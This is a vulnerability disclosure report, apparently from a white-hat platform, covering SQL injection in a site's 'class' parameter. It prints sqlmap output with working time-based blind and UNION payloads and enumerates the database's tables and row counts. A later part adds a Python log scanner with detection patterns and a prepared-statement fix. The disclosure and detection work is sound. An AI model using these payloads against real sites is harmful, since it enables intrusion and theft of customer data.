2015-12-16: Details reported to the vendor, awaiting vendor handling
2015-12-17: Vendor has confirmed; details disclosed to the vendor only
2015-12-27: Details disclosed to core white-hats and relevant domain experts
2016-01-06: Details disclosed to regular white-hats
2016-01-16: Details disclosed to intern white-hats
2016-01-28: Details disclosed to the public
Injection point: http://**.**.**.**/index.php?class=3
sqlmap identified the following injection point(s) with a total of 2253 HTTP(s) requests:
---
Parameter: class (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: class=3' AND (SELECT * FROM (SELECT(SLEEP(5)))SMiB) AND 'BzUq'='BzUq

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: class=-8597' UNION ALL SELECT CONCAT(0x71626b7171,0x72434a5047777143456e,0x7171707671),NULL,NULL,NULL,NULL,NULL-- 
---
back-end DBMS: MySQL 5.0.12

current database: 'goldenco_data'
available databases [2]:
[*] goldenco_data
[*] information_schema

Database: goldenco_data
[18 tables]
+------------------+
| action           |
| group            |
| account          |
| action_fun       |
| class            |
| contact          |
| count_list       |
| keyword          |
| member           |
| order_list       |
| order_list_fax   |
| order_list_store |
| order_list_tel   |
| order_product    |
| order_search     |
| product          |
| sms_num          |
| zipcode          |
+------------------+

Database: goldenco_data
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| order_product    | 29109   |
| order_list       | 5110    |
| member           | 983     |
| order_search     | 450     |
| zipcode          | 368     |
| contact          | 155     |
| product          | 92      |
| count_list       | 40      |
| order_list_fax   | 11      |
| class            | 9       |
| keyword          | 6       |
| action_fun       | 3       |
| order_list_tel   | 2       |
| `action`         | 1       |
| account          | 1       |
| sms_num          | 1       |
+------------------+---------+
The order and member counts are fairly large, so I did not read the data.
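The two payload shapes in the sqlmap output above (a time-based blind probe built on SLEEP(), and a UNION-based extraction that breaks out of a quoted string and ends in a SQL comment) leave recognisable traces in web server access logs. The following is an added example, not part of the original report or the affected site's code: a small Python scanner that URL-decodes the query string of each request and flags lines matching those shapes. It assumes the Apache/nginx "combined" log format; the four log lines are constructed here, with the two payloads copied from the report and URL-encoded as a browser or sqlmap would send them.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from the original report).
# Lines 2 and 3 carry the time-based and UNION payloads from the sqlmap output,
# URL-encoded; lines 1 and 4 are ordinary requests to the same parameter.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Dec/2015:10:01:02 +0800] "GET /index.php?class=3 HTTP/1.1" 200 5120
203.0.113.5 - - [16/Dec/2015:10:01:07 +0800] "GET /index.php?class=3%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29SMiB%29%20AND%20%27BzUq%27%3D%27BzUq HTTP/1.1" 200 5120
203.0.113.5 - - [16/Dec/2015:10:01:09 +0800] "GET /index.php?class=-8597%27%20UNION%20ALL%20SELECT%20CONCAT%280x71626b7171%2C0x72434a5047777143456e%2C0x7171707671%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 HTTP/1.1" 200 5300
198.51.100.7 - - [16/Dec/2015:10:02:00 +0800] "GET /index.php?class=5 HTTP/1.1" 200 4990
"""

# Combined log format: client ip, ident, user, [timestamp], "METHOD path PROTO", status
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Detection rules, each named after the technique it indicates. Patterns are
# matched against the decoded query string, so encoding does not hide them.
RULES = [
    ("time-based blind", re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)|\bBENCHMARK\s*\(", re.I)),
    ("union-based", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    # 'x'='x style tautology appended after breaking out of a quoted literal
    ("quoted tautology", re.compile(r"'(\w+)'\s*=\s*'\1\b")),
    # trailing SQL comment used to discard the rest of the original query
    ("comment terminator", re.compile(r"--(?:\s|$)|/\*")),
]


def decode_query(path):
    """Return the URL-decoded query string of a request path ('' if none).

    Decoding is applied twice so a double-encoded payload is also normalised.
    """
    if "?" not in path:
        return ""
    query = path.split("?", 1)[1]
    return unquote_plus(unquote_plus(query))


def classify_request(path):
    """Return the names of all rules whose pattern matches the decoded query."""
    query = decode_query(path)
    return [name for name, pattern in RULES if pattern.search(query)]


def scan_log(text):
    """Return one finding per log line that matches at least one rule."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # skip lines that are not in combined log format
        techniques = classify_request(match.group("path"))
        if techniques:
            findings.append({
                "ip": match.group("ip"),
                "ts": match.group("ts"),
                "status": match.group("status"),
                "techniques": techniques,
                "path": match.group("path"),
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ts"], finding["ip"], ", ".join(finding["techniques"]))
```

On the constructed sample the scanner flags only the two payload-bearing lines: the first as time-based blind plus a quoted tautology, the second as UNION-based plus a comment terminator. A real deployment would feed it the live access log and group findings by client IP and parameter; a burst of SLEEP() requests from one address, as a 2253-request sqlmap run produces, is the signal to act on. Pattern matching on logs only detects attempts after the fact; the actual fix for the class parameter is to pass it to the database through a prepared statement rather than by string concatenation.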
Severity: High
Vulnerability Rank: 17
Confirmation time: 2015-12-17 19:00
Thanks for the report.
None